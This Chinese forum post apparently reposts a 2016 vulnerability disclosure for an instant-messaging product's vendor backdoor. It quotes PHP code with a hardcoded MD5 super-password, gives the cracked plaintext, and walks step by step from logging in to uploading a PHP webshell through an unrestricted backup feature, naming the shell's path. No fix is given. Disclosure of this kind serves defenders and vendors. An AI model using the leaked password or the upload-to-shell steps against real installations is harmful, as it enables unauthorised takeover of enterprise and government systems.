HanDs
管理员

[7月漏洞公开] 集时通讯程序挖掘之厂家自带后门导致getshell硬编码密码(超级用户) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

好好学习才能天天向上。

详细说明:

厂家地址:http://**.**.**.**,有多家分公司.

案例有些可以看这:http://**.**.**.**/bugs/wooyun-2010-0134587

1.png



厂家案例众多,各大企业,政府。。。。



后门位置:

code 区域
Userweb/php/index/menuConfig.class.php





code 区域
public function dosuperLogin( )
{
$password = md5( trim( $_POST['super_password'] ) );
session_start( );
if ( "8dcf3516b4a1ca9a3cd3847e689356ea" == $password )
{
$_SESSION['super_password'] = $password;
echo "<script>location.href='index.php?module=menuConfig&action=user';</script>";
}
else
{
goback( c( "�������!" ), "index.php?module=menuConfig&action=superLogin" );
}
}







8dcf3516b4a1ca9a3cd3847e689356ea解密是:

justforever168



2.png





登陆进去看看



3.png





好了 碉堡了。。。有了后台帐号密码。。。

进入后台。getshell方式有多种,来种简单的把。



4.png





随便找个来getshell把



5.png





来到这备份处,这里可以任意上传。直接上传php马



6.png





文件路径是在 userweb/faq_data_backup/201604/a.php cmd



漏洞证明:

7.png

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
时蓖ㄑ
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复